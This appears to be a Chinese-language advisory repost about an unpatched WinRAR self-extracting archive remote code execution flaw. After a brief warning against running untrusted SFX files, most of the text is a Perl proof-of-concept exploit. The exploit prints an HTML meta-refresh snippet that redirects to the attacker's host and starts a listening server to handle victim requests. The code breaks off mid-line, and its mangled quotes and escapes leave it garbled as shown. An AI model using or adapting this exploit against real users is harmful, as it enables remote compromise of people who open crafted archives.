WinRAR 压缩工具远程代码执行漏洞 PoC

摘要

该漏洞尚未修复,可被利用。

该漏洞尚未修复,可被利用。从下面 PoC 的标题看,问题出在 WinRAR 自解压(SFX)文件上;在厂商发布修复之前,不要运行来源不明的自解压文件。

PoC: Exploit Code #!/usr/bin/perl # Title : WinRaR SFX – Remote Code Execution # Tested on Windows 7 / Server 2008 / Server 2003 # # l0s4r.com  use strict; use warnings; use IO::Socket; use MIME::Base64 qw( decode_base64 ); use Socket ‘inet_ntoa’; use Sys::Hostname ‘hostname’;  print ” Mohammad Reza Espargham/n/n”; my $ip = inet_ntoa(scalar gethostbyname(hostname() || ‘localhost’));  my $port = 80;  print “Winrar HTML Code/n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip . ‘”></head></html>’.”/n/n” if($port==80); print “Winrar HTML Code/n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip . ‘:’ . $port . ‘”></head></html>’.”/n/n” if($port!=80);  my $server = new IO::Socket::INET( Proto => ‘tcp’, LocalPort => $port, Listen => SOMAXCONN, ReuseAddr => 1) or die “Unable to create server socket”;  # Server loop while(my $client = $server->accept()) { my $client_info; while(<$client>) { last if /^/r/n$/; $client_info .= $_; } incoming($client, $client_info); }  sub incoming { print “/n=== Incoming Request:/n”; my $client = shift; print $c
